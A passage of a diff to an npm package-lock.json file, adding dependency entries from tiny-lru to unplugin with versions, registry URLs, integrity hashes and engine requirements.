"resolved": "https://registry.npmjs.org/tiny-lru/-/tiny-lru-8.0.2.tgz", + "integrity": "sha512-ApGvZ6vVvTNdsmt676grvCkUCGwzG9IqXma5Z07xJgiC5L7akUMof5U8G2JTI9Rz/ovtVhJBlY6mNhEvtjzOIg==", + "engines": { + "node": ">=6" + } + }, + "node_modules/tiny-warning": { + "version": "1.0.3", + "resolved": "https://registry.npmjs.org/tiny-warning/-/tiny-warning-1.0.3.tgz", + "integrity": "sha512-lBN9zLN/oAf68o3zNXYrdCt1kP8WsiGW8Oo2ka41b2IM5JL/S1CTyX1rW0mb/zSuJun0ZUrDxx4sqvYS2FWzPA==", + "dev": true + }, + "node_modules/tinycolor2": { + "version": "1.6.0", + "resolved": "https://registry.npmjs.org/tinycolor2/-/tinycolor2-1.6.0.tgz", + "integrity": "sha512-XPaBkWQJdsf3pLKJV9p4qN/S+fm2Oj8AIPo1BTUhg5oxkvm9+SVEGFdhyOz7tTdUTfvxMiAs4sp6/eZO2Ew+pw==", + "dev": true + }, + "node_modules/tinyexec": { + "version": "0.3.2", + "resolved": "https://registry.npmjs.org/tinyexec/-/tinyexec-0.3.2.tgz", + "integrity": "sha512-KQQR9yN7R5+OSwaK0XQoj22pwHoTlgYqmUscPYoknOoWCWfj/5/ABTMRi69FrKU5ffPVh5QcFikpWJI/P1ocHA==", + "dev": true, + "license": "MIT" + }, + "node_modules/tinyrainbow": { + "version": "1.2.0", + "resolved": "https://registry.npmjs.org/tinyrainbow/-/tinyrainbow-1.2.0.tgz", + "integrity": "sha512-weEDEq7Z5eTHPDh4xjX789+fHfF+P8boiFB+0vbWzpbnbsEr/GRaohi/uMKxg8RZMXnl1ItAi/IUHWMsjDV7kQ==", + "dev": true, + "license": "MIT", + "engines": { + "node": ">=14.0.0" + } + }, + "node_modules/tinyspy": { + "version": "3.0.2", + "resolved": "https://registry.npmjs.org/tinyspy/-/tinyspy-3.0.2.tgz", + "integrity": "sha512-n1cw8k1k0x4pgA2+9XrOkFydTerNcJ1zWCO5Nn9scWHTD+5tp8dghT2x1uduQePZTZgd3Tupf+x9BxJjeJi77Q==", + "dev": true, + "license": "MIT", + "engines": { + "node": ">=14.0.0" + } + }, + "node_modules/tlds": { + "version": "1.228.0", + "resolved": "https://registry.npmjs.org/tlds/-/tlds-1.228.0.tgz", + "integrity": "sha512-Q0TU9zh5hDs2CpRFNM7SOW3K7OSgUgJC/cMrq9t44ei4tu+G3KV8BZyIJuYVvryJHH96mKgc9WXdhgKVvGD7jg==", + "dev": true, + "bin": { + "tlds": "bin.js" + } + }, + "node_modules/tmatch": { + "version": "2.0.1", + "resolved": "https://registry.npmjs.org/tmatch/-/tmatch-2.0.1.tgz", + "integrity": "sha512-OHn/lzGWAsh5MBNTXUiHc595HAbIASCs6M+hDrkMObbSzsXej0SCKrQxr4J6EmRHbdo3qwyetPzuzEktkZiy4g==", + "dev": true + }, + "node_modules/tmp": { + "version": "0.2.3", + "resolved": "https://registry.npmjs.org/tmp/-/tmp-0.2.3.tgz", + "integrity": "sha512-nZD7m9iCPC5g0pYmcaxogYKggSfLsdxl8of3Q/oIbqCqLLIO9IAF0GWjX1z9NZRHPiXv8Wex4yDCaZsgEw0Y8w==", + "engines": { + "node": ">=14.14" + } + }, + "node_modules/to-object-path": { + 
"version": "0.3.0", + "resolved": "https://registry.npmjs.org/to-object-path/-/to-object-path-0.3.0.tgz", + "integrity": "sha512-9mWHdnGRuh3onocaHzukyvCZhzvr6tiflAy/JRFXcJX0TjgfWA9pk9t8CMbzmBE4Jfw58pXbkngtBtqYxzNEyg==", + "dev": true, + "dependencies": { + "kind-of": "^3.0.2" + }, + "engines": { + "node": ">=0.10.0" + } + }, + "node_modules/to-object-path/node_modules/kind-of": { + "version": "3.2.2", + "resolved": "https://registry.npmjs.org/kind-of/-/kind-of-3.2.2.tgz", + "integrity": "sha512-NOW9QQXMoZGg/oqnVNoNTTIFEIid1627WCffUBJEdMxYApq7mNE7CpzucIPc+ZQg25Phej7IJSmX3hO+oblOtQ==", + "dev": true, + "dependencies": { + "is-buffer": "^1.1.5" + }, + "engines": { + "node": ">=0.10.0" + } + }, + "node_modules/to-regex": { + "version": "3.0.2", + "resolved": "https://registry.npmjs.org/to-regex/-/to-regex-3.0.2.tgz", + "integrity": "sha512-FWtleNAtZ/Ki2qtqej2CXTOayOH9bHDQF+Q48VpWyDXjbYxA4Yz8iDB31zXOBUlOHHKidDbqGVrTUvQMPmBGBw==", + "dev": true, + "dependencies": { + "define-property": "^2.0.2", + "extend-shallow": "^3.0.2", + "regex-not": "^1.0.2", + "safe-regex": "^1.1.0" + }, + "engines": { + "node": ">=0.10.0" + } + }, + "node_modules/to-regex-range": { + "version": "5.0.1", + "resolved": "https://registry.npmjs.org/to-regex-range/-/to-regex-range-5.0.1.tgz", + "integrity": "sha512-65P7iz6X5yEr1cwcgvQxbbIw7Uk3gOy5dIdtZ4rDveLqhrdJP+Li/Hx6tyK0NEb+2GCyneCMJiGqrADCSNk8sQ==", + "dependencies": { + "is-number": "^7.0.0" + }, + "engines": { + "node": ">=8.0" + } + }, + "node_modules/to-string-loader": { + "version": "1.2.0", + "resolved": "https://registry.npmjs.org/to-string-loader/-/to-string-loader-1.2.0.tgz", + "integrity": "sha512-KsWUL8FccgBW9FPFm4vYoQbOOcO5m6hKOGYoXjbseD9/4Ft+ravXN5jolQ9kTKYcK4zPt1j+khx97GPGnVoi6A==", + "dev": true, + "dependencies": { + "loader-utils": "^1.0.0" + } + }, + "node_modules/to-string-loader/node_modules/big.js": { + "version": "5.2.2", + "resolved": "https://registry.npmjs.org/big.js/-/big.js-5.2.2.tgz", + "integrity": "sha512-vyL2OymJxmarO8gxMr0mhChsO9QGwhynfuu4+MHTAW6czfq9humCB7rKpUjDd9YUiDPU4mzpyupFSvOClAwbmQ==", + "dev": true, + "engines": { + "node": "*" + } + }, + "node_modules/to-string-loader/node_modules/json5": { + "version": "1.0.2", + "resolved": "https://registry.npmjs.org/json5/-/json5-1.0.2.tgz", + "integrity": "sha512-g1MWMLBiz8FKi1e4w0UyVL3w+iJceWAFBAaBnnGKOpNa5f8TLktkbre1+s6oICydWAm+HRUGTmI+//xv2hvXYA==", + "dev": true, + "dependencies": { + "minimist": "^1.2.0" + }, + "bin": { + "json5": "lib/cli.js" + } + }, + "node_modules/to-string-loader/node_modules/loader-utils": { + "version": "1.4.2", + "resolved": "https://registry.npmjs.org/loader-utils/-/loader-utils-1.4.2.tgz", + "integrity": "sha512-I5d00Pd/jwMD2QCduo657+YM/6L3KZu++pmX9VFncxaxvHcru9jx1lBaFft+r4Mt2jK0Yhp41XlRAihzPxHNCg==", + "dev": true, + "dependencies": { + "big.js": "^5.2.2", + "emojis-list": "^3.0.0", + "json5": "^1.0.1" + }, + "engines": { + "node": ">=4.0.0" + } + }, + "node_modules/to-through": { + "version": "3.0.0", + "resolved": "https://registry.npmjs.org/to-through/-/to-through-3.0.0.tgz", + "integrity": "sha512-y8MN937s/HVhEoBU1SxfHC+wxCHkV1a9gW8eAdTadYh/bGyesZIVcbjI+mSpFbSVwQici/XjBjuUyri1dnXwBw==", + "dev": true, + "dependencies": { + "streamx": "^2.12.5" + }, + "engines": { + "node": ">=10.13.0" + } + }, + "node_modules/toidentifier": { + "version": "1.0.1", + "resolved": "https://registry.npmjs.org/toidentifier/-/toidentifier-1.0.1.tgz", + "integrity": "sha512-o5sSPKEkg/DIQNmH43V0/uerLrpzVedkUh8tGNvaeXpfpuwjKenlSox/2O/BTlZUtEe+JG7s5YhEz608PlAHRA==", + "engines": { 
+ "node": ">=0.6" + } + }, + "node_modules/token-stream": { + "version": "1.0.0", + "resolved": "https://registry.npmjs.org/token-stream/-/token-stream-1.0.0.tgz", + "integrity": "sha1-zCAOqyYT9BZtJ/+a/HylbUnfbrQ=" + }, + "node_modules/toposort": { + "version": "2.0.2", + "resolved": "https://registry.npmjs.org/toposort/-/toposort-2.0.2.tgz", + "integrity": "sha1-riF2gXXRVZ1IvvNUILL0li8JwzA=", + "dev": true + }, + "node_modules/toposort-class": { + "version": "1.0.1", + "resolved": "https://registry.npmjs.org/toposort-class/-/toposort-class-1.0.1.tgz", + "integrity": "sha1-f/0feMi+KMO6Rc1OGj9e4ZO9mYg=" + }, + "node_modules/touch": { + "version": "3.1.0", + "resolved": "https://registry.npmjs.org/touch/-/touch-3.1.0.tgz", + "integrity": "sha512-WBx8Uy5TLtOSRtIq+M03/sKDrXCLHxwDcquSP2c43Le03/9serjQBIztjRz6FkJez9D/hleyAXTBGLwwZUw9lA==", + "dev": true, + "dependencies": { + "nopt": "~1.0.10" + }, + "bin": { + "nodetouch": "bin/nodetouch.js" + } + }, + "node_modules/touch/node_modules/nopt": { + "version": "1.0.10", + "resolved": "https://registry.npmjs.org/nopt/-/nopt-1.0.10.tgz", + "integrity": "sha512-NWmpvLSqUrgrAC9HCuxEvb+PSloHpqVu+FqcO4eeF2h5qYRhA7ev6KvelyQAKtegUbC6RypJnlEOhd8vloNKYg==", + "dev": true, + "dependencies": { + "abbrev": "1" + }, + "bin": { + "nopt": "bin/nopt.js" + }, + "engines": { + "node": "*" + } + }, + "node_modules/tough-cookie": { + "version": "4.1.3", + "resolved": "https://registry.npmjs.org/tough-cookie/-/tough-cookie-4.1.3.tgz", + "integrity": "sha512-aX/y5pVRkfRnfmuX+OdbSdXvPe6ieKX/G2s7e98f4poJHnqH3281gDPm/metm6E/WRamfx7WC4HUqkWHfQHprw==", + "dependencies": { + "psl": "^1.1.33", + "punycode": "^2.1.1", + "universalify": "^0.2.0", + "url-parse": "^1.5.3" + }, + "engines": { + "node": ">=6" + } + }, + "node_modules/tough-cookie/node_modules/universalify": { + "version": "0.2.0", + "resolved": "https://registry.npmjs.org/universalify/-/universalify-0.2.0.tgz", + "integrity": "sha512-CJ1QgKmNg3CwvAv/kOFmtnEN05f0D/cn9QntgNOQlQF9dgvVTHj3t+8JPdjqawCHk7V/KA+fbUqzZ9XWhcqPUg==", + "engines": { + "node": ">= 4.0.0" + } + }, + "node_modules/traverse": { + "version": "0.6.9", + "resolved": "https://registry.npmjs.org/traverse/-/traverse-0.6.9.tgz", + "integrity": "sha512-7bBrcF+/LQzSgFmT0X5YclVqQxtv7TDJ1f8Wj7ibBu/U6BMLeOpUxuZjV7rMc44UtKxlnMFigdhFAIszSX1DMg==", + "license": "MIT", + "dependencies": { + "gopd": "^1.0.1", + "typedarray.prototype.slice": "^1.0.3", + "which-typed-array": "^1.1.15" + }, + "engines": { + "node": ">= 0.4" + }, + "funding": { + "url": "https://github.com/sponsors/ljharb" + } + }, + "node_modules/tree-dump": { + "version": "1.0.2", + "resolved": "https://registry.npmjs.org/tree-dump/-/tree-dump-1.0.2.tgz", + "integrity": "sha512-dpev9ABuLWdEubk+cIaI9cHwRNNDjkBBLXTwI4UCUFdQ5xXKqNXoK4FEciw/vxf+NQ7Cb7sGUyeUtORvHIdRXQ==", + "dev": true, + "license": "Apache-2.0", + "engines": { + "node": ">=10.0" + }, + "funding": { + "type": "github", + "url": "https://github.com/sponsors/streamich" + }, + "peerDependencies": { + "tslib": "2" + } + }, + "node_modules/ts-api-utils": { + "version": "1.3.0", + "resolved": "https://registry.npmjs.org/ts-api-utils/-/ts-api-utils-1.3.0.tgz", + "integrity": "sha512-UQMIo7pb8WRomKR1/+MFVLTroIvDVtMX3K6OUir8ynLyzB8Jeriont2bTAtmNPa1ekAgN7YPDyf6V+ygrdU+eQ==", + "dev": true, + "engines": { + "node": ">=16" + }, + "peerDependencies": { + "typescript": ">=4.2.0" + } + }, + "node_modules/ts-dedent": { + "version": "2.2.0", + "resolved": "https://registry.npmjs.org/ts-dedent/-/ts-dedent-2.2.0.tgz", + "integrity": 
"sha512-q5W7tVM71e2xjHZTlgfTDoPF/SmqKG5hddq9SzR49CH2hayqRKJtQ4mtRlSxKaJlR/+9rEM+mnBHf7I2/BQcpQ==", + "dev": true, + "license": "MIT", + "engines": { + "node": ">=6.10" + } + }, + "node_modules/tsconfig-paths": { + "version": "3.14.1", + "resolved": "https://registry.npmjs.org/tsconfig-paths/-/tsconfig-paths-3.14.1.tgz", + "integrity": "sha512-fxDhWnFSLt3VuTwtvJt5fpwxBHg5AdKWMsgcPOOIilyjymcYVZoCQF8fvFRezCNfblEXmi+PcM1eYHeOAgXCOQ==", + "dev": true, + "dependencies": { + "@types/json5": "^0.0.29", + "json5": "^1.0.1", + "minimist": "^1.2.6", + "strip-bom": "^3.0.0" + } + }, + "node_modules/tsconfig-paths/node_modules/json5": { + "version": "1.0.2", + "resolved": "https://registry.npmjs.org/json5/-/json5-1.0.2.tgz", + "integrity": "sha512-g1MWMLBiz8FKi1e4w0UyVL3w+iJceWAFBAaBnnGKOpNa5f8TLktkbre1+s6oICydWAm+HRUGTmI+//xv2hvXYA==", + "dev": true, + "dependencies": { + "minimist": "^1.2.0" + }, + "bin": { + "json5": "lib/cli.js" + } + }, + "node_modules/tslib": { + "version": "2.5.2", + "resolved": "https://registry.npmjs.org/tslib/-/tslib-2.5.2.tgz", + "integrity": "sha512-5svOrSA2w3iGFDs1HibEVBGbDrAY82bFQ3HZ3ixB+88nsbsWQoKqDRb5UBYAUPEzbBn6dAp5gRNXglySbx1MlA==" + }, + "node_modules/tsscmp": { + "version": "1.0.6", + "resolved": "https://registry.npmjs.org/tsscmp/-/tsscmp-1.0.6.tgz", + "integrity": "sha512-LxhtAkPDTkVCMQjt2h6eBVY28KCjikZqZfMcC15YBeNjkgUpdCfBu5HoiOTDu86v6smE8yOjyEktJ8hlbANHQA==", + "engines": { + "node": ">=0.6.x" + } + }, + "node_modules/tty-browserify": { + "version": "0.0.1", + "resolved": "https://registry.npmjs.org/tty-browserify/-/tty-browserify-0.0.1.tgz", + "integrity": "sha512-C3TaO7K81YvjCgQH9Q1S3R3P3BtN3RIM8n+OvX4il1K1zgE8ZhI0op7kClgkxtutIE8hQrcrHBXvIheqKUUCxw==", + "dev": true + }, + "node_modules/tunnel-agent": { + "version": "0.6.0", + "resolved": "https://registry.npmjs.org/tunnel-agent/-/tunnel-agent-0.6.0.tgz", + "integrity": "sha1-J6XeoGs2sEoKmWZ3SykIaPD8QP0=", + "dependencies": { + "safe-buffer": "^5.0.1" + }, + "engines": { + "node": "*" + } + }, + "node_modules/tweetnacl": { + "version": "0.14.5", + "resolved": "https://registry.npmjs.org/tweetnacl/-/tweetnacl-0.14.5.tgz", + "integrity": "sha1-WuaBd/GS1EViadEIr6k/+HQ/T2Q=" + }, + "node_modules/type": { + "version": "2.7.2", + "resolved": "https://registry.npmjs.org/type/-/type-2.7.2.tgz", + "integrity": "sha512-dzlvlNlt6AXU7EBSfpAscydQ7gXB+pPGsPnfJnZpiNJBDj7IaJzQlBZYGdEi4R9HmPdBv2XmWJ6YUtoTa7lmCw==" + }, + "node_modules/type-check": { + "version": "0.4.0", + "resolved": "https://registry.npmjs.org/type-check/-/type-check-0.4.0.tgz", + "integrity": "sha512-XleUoc9uwGXqjWwXaUTZAmzMcFZ5858QA2vvx1Ur5xIcixXIP+8LnFDgRplU30us6teqdlskFfu+ae4K79Ooew==", + "dependencies": { + "prelude-ls": "^1.2.1" + }, + "engines": { + "node": ">= 0.8.0" + } + }, + "node_modules/type-detect": { + "version": "4.0.8", + "resolved": "https://registry.npmjs.org/type-detect/-/type-detect-4.0.8.tgz", + "integrity": "sha512-0fr/mIH1dlO+x7TlcMy+bIDqKPsw/70tVyeHW787goQjhmqaZe10uwLujubK9q9Lg6Fiho1KUKDYz0Z7k7g5/g==", + "dev": true, + "engines": { + "node": ">=4" + } + }, + "node_modules/type-fest": { + "version": "0.20.2", + "resolved": "https://registry.npmjs.org/type-fest/-/type-fest-0.20.2.tgz", + "integrity": "sha512-Ne+eE4r0/iWnpAxD852z3A+N0Bt5RN//NjJwRd2VFHEmrywxf5vsZlh4R6lixl6B+wz/8d+maTSAkN1FIkI3LQ==", + "engines": { + "node": ">=10" + }, + "funding": { + "url": "https://github.com/sponsors/sindresorhus" + } + }, + "node_modules/type-is": { + "version": "1.6.18", + "resolved": "https://registry.npmjs.org/type-is/-/type-is-1.6.18.tgz", + 
"integrity": "sha512-TkRKr9sUTxEH8MdfuCSP7VizJyzRNMjj2J2do2Jr3Kym598JVdEksuzPQCnlFPW4ky9Q+iA+ma9BGm06XQBy8g==", + "dependencies": { + "media-typer": "0.3.0", + "mime-types": "~2.1.24" + }, + "engines": { + "node": ">= 0.6" + } + }, + "node_modules/typed-array-buffer": { + "version": "1.0.2", + "resolved": "https://registry.npmjs.org/typed-array-buffer/-/typed-array-buffer-1.0.2.tgz", + "integrity": "sha512-gEymJYKZtKXzzBzM4jqa9w6Q1Jjm7x2d+sh19AdsD4wqnMPDYyvwpsIc2Q/835kHuo3BEQ7CjelGhfTsoBb2MQ==", + "license": "MIT", + "dependencies": { + "call-bind": "^1.0.7", + "es-errors": "^1.3.0", + "is-typed-array": "^1.1.13" + }, + "engines": { + "node": ">= 0.4" + } + }, + "node_modules/typed-array-byte-length": { + "version": "1.0.1", + "resolved": "https://registry.npmjs.org/typed-array-byte-length/-/typed-array-byte-length-1.0.1.tgz", + "integrity": "sha512-3iMJ9q0ao7WE9tWcaYKIptkNBuOIcZCCT0d4MRvuuH88fEoEH62IuQe0OtraD3ebQEoTRk8XCBoknUNc1Y67pw==", + "license": "MIT", + "dependencies": { + "call-bind": "^1.0.7", + "for-each": "^0.3.3", + "gopd": "^1.0.1", + "has-proto": "^1.0.3", + "is-typed-array": "^1.1.13" + }, + "engines": { + "node": ">= 0.4" + }, + "funding": { + "url": "https://github.com/sponsors/ljharb" + } + }, + "node_modules/typed-array-byte-offset": { + "version": "1.0.2", + "resolved": "https://registry.npmjs.org/typed-array-byte-offset/-/typed-array-byte-offset-1.0.2.tgz", + "integrity": "sha512-Ous0vodHa56FviZucS2E63zkgtgrACj7omjwd/8lTEMEPFFyjfixMZ1ZXenpgCFBBt4EC1J2XsyVS2gkG0eTFA==", + "license": "MIT", + "dependencies": { + "available-typed-arrays": "^1.0.7", + "call-bind": "^1.0.7", + "for-each": "^0.3.3", + "gopd": "^1.0.1", + "has-proto": "^1.0.3", + "is-typed-array": "^1.1.13" + }, + "engines": { + "node": ">= 0.4" + }, + "funding": { + "url": "https://github.com/sponsors/ljharb" + } + }, + "node_modules/typed-array-length": { + "version": "1.0.6", + "resolved": "https://registry.npmjs.org/typed-array-length/-/typed-array-length-1.0.6.tgz", + "integrity": "sha512-/OxDN6OtAk5KBpGb28T+HZc2M+ADtvRxXrKKbUwtsLgdoxgX13hyy7ek6bFRl5+aBs2yZzB0c4CnQfAtVypW/g==", + "license": "MIT", + "dependencies": { + "call-bind": "^1.0.7", + "for-each": "^0.3.3", + "gopd": "^1.0.1", + "has-proto": "^1.0.3", + "is-typed-array": "^1.1.13", + "possible-typed-array-names": "^1.0.0" + }, + "engines": { + "node": ">= 0.4" + }, + "funding": { + "url": "https://github.com/sponsors/ljharb" + } + }, + "node_modules/typedarray": { + "version": "0.0.6", + "resolved": "https://registry.npmjs.org/typedarray/-/typedarray-0.0.6.tgz", + "integrity": "sha1-hnrHTjhkGHsdPUfZlqeOxciDB3c=" + }, + "node_modules/typedarray.prototype.slice": { + "version": "1.0.3", + "resolved": "https://registry.npmjs.org/typedarray.prototype.slice/-/typedarray.prototype.slice-1.0.3.tgz", + "integrity": "sha512-8WbVAQAUlENo1q3c3zZYuy5k9VzBQvp8AX9WOtbvyWlLM1v5JaSRmjubLjzHF4JFtptjH/5c/i95yaElvcjC0A==", + "license": "MIT", + "dependencies": { + "call-bind": "^1.0.7", + "define-properties": "^1.2.1", + "es-abstract": "^1.23.0", + "es-errors": "^1.3.0", + "typed-array-buffer": "^1.0.2", + "typed-array-byte-offset": "^1.0.2" + }, + "engines": { + "node": ">= 0.4" + }, + "funding": { + "url": "https://github.com/sponsors/ljharb" + } + }, + "node_modules/typescript": { + "version": "5.5.4", + "resolved": "https://registry.npmjs.org/typescript/-/typescript-5.5.4.tgz", + "integrity": "sha512-Mtq29sKDAEYP7aljRgtPOpTvOfbwRWlS6dPRzwjdE+C0R4brX/GUyhHSecbHMFLNBLcJIPt9nl9yG5TZ1weH+Q==", + "dev": true, + "bin": { + "tsc": "bin/tsc", + "tsserver": 
"bin/tsserver" + }, + "engines": { + "node": ">=14.17" + } + }, + "node_modules/typical": { + "version": "2.6.1", + "resolved": "https://registry.npmjs.org/typical/-/typical-2.6.1.tgz", + "integrity": "sha1-XAgOXWYcu+OCWdLnCjxyU+hziB0=" + }, + "node_modules/uc.micro": { + "version": "1.0.6", + "resolved": "https://registry.npmjs.org/uc.micro/-/uc.micro-1.0.6.tgz", + "integrity": "sha512-8Y75pvTYkLJW2hWQHXxoqRgV7qb9B+9vFEtidML+7koHUFapnVJAZ6cKs+Qjz5Aw3aZWHMC6u0wJE3At+nSGwA==", + "dev": true + }, + "node_modules/ufo": { + "version": "1.5.4", + "resolved": "https://registry.npmjs.org/ufo/-/ufo-1.5.4.tgz", + "integrity": "sha512-UsUk3byDzKd04EyoZ7U4DOlxQaD14JUKQl6/P7wiX4FNvUfm3XL246n9W5AmqwW5RSFJ27NAuM0iLscAOYUiGQ==", + "dev": true, + "license": "MIT" + }, + "node_modules/uglify-js": { + "version": "3.15.0", + "resolved": "https://registry.npmjs.org/uglify-js/-/uglify-js-3.15.0.tgz", + "integrity": "sha512-x+xdeDWq7FiORDvyIJ0q/waWd4PhjBNOm5dQUOq2AKC0IEjxOS66Ha9tctiVDGcRQuh69K7fgU5oRuTK4cysSg==", + "bin": { + "uglifyjs": "bin/uglifyjs" + }, + "engines": { + "node": ">=0.8.0" + } + }, + "node_modules/uid-safe": { + "version": "2.1.5", + "resolved": "https://registry.npmjs.org/uid-safe/-/uid-safe-2.1.5.tgz", + "integrity": "sha512-KPHm4VL5dDXKz01UuEd88Df+KzynaohSL9fBh096KWAxSKZQDI2uBrVqtvRM4rwrIrRRKsdLNML/lnaaVSRioA==", + "dependencies": { + "random-bytes": "~1.0.0" + }, + "engines": { + "node": ">= 0.8" + } + }, + "node_modules/uid2": { + "version": "0.0.4", + "resolved": "https://registry.npmjs.org/uid2/-/uid2-0.0.4.tgz", + "integrity": "sha512-IevTus0SbGwQzYh3+fRsAMTVVPOoIVufzacXcHPmdlle1jUpq7BRL+mw3dgeLanvGZdwwbWhRV6XrcFNdBmjWA==" + }, + "node_modules/ultron": { + "version": "1.0.2", + "resolved": "https://registry.npmjs.org/ultron/-/ultron-1.0.2.tgz", + "integrity": "sha512-QMpnpVtYaWEeY+MwKDN/UdKlE/LsFZXM5lO1u7GaZzNgmIbGixHEmVMIKT+vqYOALu3m5GYQy9kz4Xu4IVn7Ow==" + }, + "node_modules/umzug": { + "version": "2.3.0", + "resolved": "https://registry.npmjs.org/umzug/-/umzug-2.3.0.tgz", + "integrity": "sha512-Z274K+e8goZK8QJxmbRPhl89HPO1K+ORFtm6rySPhFKfKc5GHhqdzD0SGhSWHkzoXasqJuItdhorSvY7/Cgflw==", + "dev": true, + "dependencies": { + "bluebird": "^3.7.2" + }, + "engines": { + "node": ">=6.0.0" + } + }, + "node_modules/unbox-primitive": { + "version": "1.0.2", + "resolved": "https://registry.npmjs.org/unbox-primitive/-/unbox-primitive-1.0.2.tgz", + "integrity": "sha512-61pPlCD9h51VoreyJ0BReideM3MDKMKnh6+V9L08331ipq6Q8OFXZYiqP6n/tbHx4s5I9uRhcye6BrbkizkBDw==", + "dependencies": { + "call-bind": "^1.0.2", + "has-bigints": "^1.0.2", + "has-symbols": "^1.0.3", + "which-boxed-primitive": "^1.0.2" + }, + "funding": { + "url": "https://github.com/sponsors/ljharb" + } + }, + "node_modules/uncontrollable": { + "version": "7.2.1", + "resolved": "https://registry.npmjs.org/uncontrollable/-/uncontrollable-7.2.1.tgz", + "integrity": "sha512-svtcfoTADIB0nT9nltgjujTi7BzVmwjZClOmskKu/E8FW9BXzg9os8OLr4f8Dlnk0rYWJIWr4wv9eKUXiQvQwQ==", + "dev": true, + "dependencies": { + "@babel/runtime": "^7.6.3", + "@types/react": ">=16.9.11", + "invariant": "^2.2.4", + "react-lifecycles-compat": "^3.0.4" + }, + "peerDependencies": { + "react": ">=15.0.0" + } + }, + "node_modules/undefsafe": { + "version": "2.0.5", + "resolved": "https://registry.npmjs.org/undefsafe/-/undefsafe-2.0.5.tgz", + "integrity": "sha512-WxONCrssBM8TSPRqN5EmsjVrsv4A8X12J4ArBiiayv3DyyG3ZlIg6yysuuSYdZsVz3TKcTg2fd//Ujd4CHV1iA==", + "dev": true + }, + "node_modules/underscore": { + "version": "1.13.6", + "resolved": 
"https://registry.npmjs.org/underscore/-/underscore-1.13.6.tgz", + "integrity": "sha512-+A5Sja4HP1M08MaXya7p5LvjuM7K6q/2EaC0+iovj/wOcMsTzMvDFbasi/oSapiwOlt252IqsKqPjCl7huKS0A==" + }, + "node_modules/uni-global": { + "version": "1.0.0", + "resolved": "https://registry.npmjs.org/uni-global/-/uni-global-1.0.0.tgz", + "integrity": "sha512-WWM3HP+siTxzIWPNUg7hZ4XO8clKi6NoCAJJWnuRL+BAqyFXF8gC03WNyTefGoUXYc47uYgXxpKLIEvo65PEHw==", + "dependencies": { + "type": "^2.5.0" + } + }, + "node_modules/unicode-canonical-property-names-ecmascript": { + "version": "2.0.0", + "resolved": "https://registry.npmjs.org/unicode-canonical-property-names-ecmascript/-/unicode-canonical-property-names-ecmascript-2.0.0.tgz", + "integrity": "sha512-yY5PpDlfVIU5+y/BSCxAJRBIS1Zc2dDG3Ujq+sR0U+JjUevW2JhocOF+soROYDSaAezOzOKuyyixhD6mBknSmQ==", + "dev": true, + "engines": { + "node": ">=4" + } + }, + "node_modules/unicode-match-property-ecmascript": { + "version": "2.0.0", + "resolved": "https://registry.npmjs.org/unicode-match-property-ecmascript/-/unicode-match-property-ecmascript-2.0.0.tgz", + "integrity": "sha512-5kaZCrbp5mmbz5ulBkDkbY0SsPOjKqVS35VpL9ulMPfSl0J0Xsm+9Evphv9CoIZFwre7aJoa94AY6seMKGVN5Q==", + "dev": true, + "dependencies": { + "unicode-canonical-property-names-ecmascript": "^2.0.0", + "unicode-property-aliases-ecmascript": "^2.0.0" + }, + "engines": { + "node": ">=4" + } + }, + "node_modules/unicode-match-property-value-ecmascript": { + "version": "2.1.0", + "resolved": "https://registry.npmjs.org/unicode-match-property-value-ecmascript/-/unicode-match-property-value-ecmascript-2.1.0.tgz", + "integrity": "sha512-qxkjQt6qjg/mYscYMC0XKRn3Rh0wFPlfxB0xkt9CfyTvpX1Ra0+rAmdX2QyAobptSEvuy4RtpPRui6XkV+8wjA==", + "dev": true, + "engines": { + "node": ">=4" + } + }, + "node_modules/unicode-property-aliases-ecmascript": { + "version": "2.1.0", + "resolved": "https://registry.npmjs.org/unicode-property-aliases-ecmascript/-/unicode-property-aliases-ecmascript-2.1.0.tgz", + "integrity": "sha512-6t3foTQI9qne+OZoVQB/8x8rk2k1eVy1gRXhV3oFQ5T6R1dqQ1xtin3XqSlx3+ATBkliTaR/hHyJBm+LVPNM8w==", + "dev": true, + "engines": { + "node": ">=4" + } + }, + "node_modules/unicorn-magic": { + "version": "0.3.0", + "resolved": "https://registry.npmjs.org/unicorn-magic/-/unicorn-magic-0.3.0.tgz", + "integrity": "sha512-+QBBXBCvifc56fsbuxZQ6Sic3wqqc3WWaqxs58gvJrcOuN83HGTCwz3oS5phzU9LthRNE9VrJCFCLUgHeeFnfA==", + "dev": true, + "license": "MIT", + "engines": { + "node": ">=18" + }, + "funding": { + "url": "https://github.com/sponsors/sindresorhus" + } + }, + "node_modules/union-value": { + "version": "1.0.1", + "resolved": "https://registry.npmjs.org/union-value/-/union-value-1.0.1.tgz", + "integrity": "sha512-tJfXmxMeWYnczCVs7XAEvIV7ieppALdyepWMkHkwciRpZraG/xwT+s2JN8+pr1+8jCRf80FFzvr+MpQeeoF4Xg==", + "dev": true, + "dependencies": { + "arr-union": "^3.1.0", + "get-value": "^2.0.6", + "is-extendable": "^0.1.1", + "set-value": "^2.0.1" + }, + "engines": { + "node": ">=0.10.0" + } + }, + "node_modules/union-value/node_modules/is-extendable": { + "version": "0.1.1", + "resolved": "https://registry.npmjs.org/is-extendable/-/is-extendable-0.1.1.tgz", + "integrity": "sha512-5BMULNob1vgFX6EjQw5izWDxrecWK9AM72rugNr0TFldMOi0fj6Jk+zeKIt0xGj4cEfQIJth4w3OKWOJ4f+AFw==", + "dev": true, + "engines": { + "node": ">=0.10.0" + } + }, + "node_modules/universalify": { + "version": "2.0.0", + "resolved": "https://registry.npmjs.org/universalify/-/universalify-2.0.0.tgz", + "integrity": 
"sha512-hAZsKq7Yy11Zu1DE0OzWjw7nnLZmJZYTDZZyEFHZdUhV8FkH5MCfoU1XMaxXovpyW5nq5scPqq0ZDP9Zyl04oQ==", + "engines": { + "node": ">= 10.0.0" + } + }, + "node_modules/unpipe": { + "version": "1.0.0", + "resolved": "https://registry.npmjs.org/unpipe/-/unpipe-1.0.0.tgz", + "integrity": "sha1-sr9O6FFKrmFltIF4KdIbLvSZBOw=", + "engines": { + "node": ">= 0.8" + } + }, + "node_modules/unplugin": { + "version": "1.16.1", + "resolved": "https://registry.npmjs.org/unplugin/-/unplugin-1.16.1.tgz", + "integrity": "sha512-4/u/j4FrCKdi17jaxuJA0jClGxB1AvU2hw/IuayPc4ay1XGaJs/rbb4v5WKwAjNifjmXK9PIFyuPiaK8azyR9w==", + "dev": true, + "license": "MIT", + "dependencies": { + "acorn": "^8.14.0", + "webpack-virtual-modules": "^0.6.2" + }, + "engines": { + "node": ">=14.0.0" + } + }, + "node_modules/unplugin/node_modules/acorn": { + "version": "8.14.1", + "resolved": 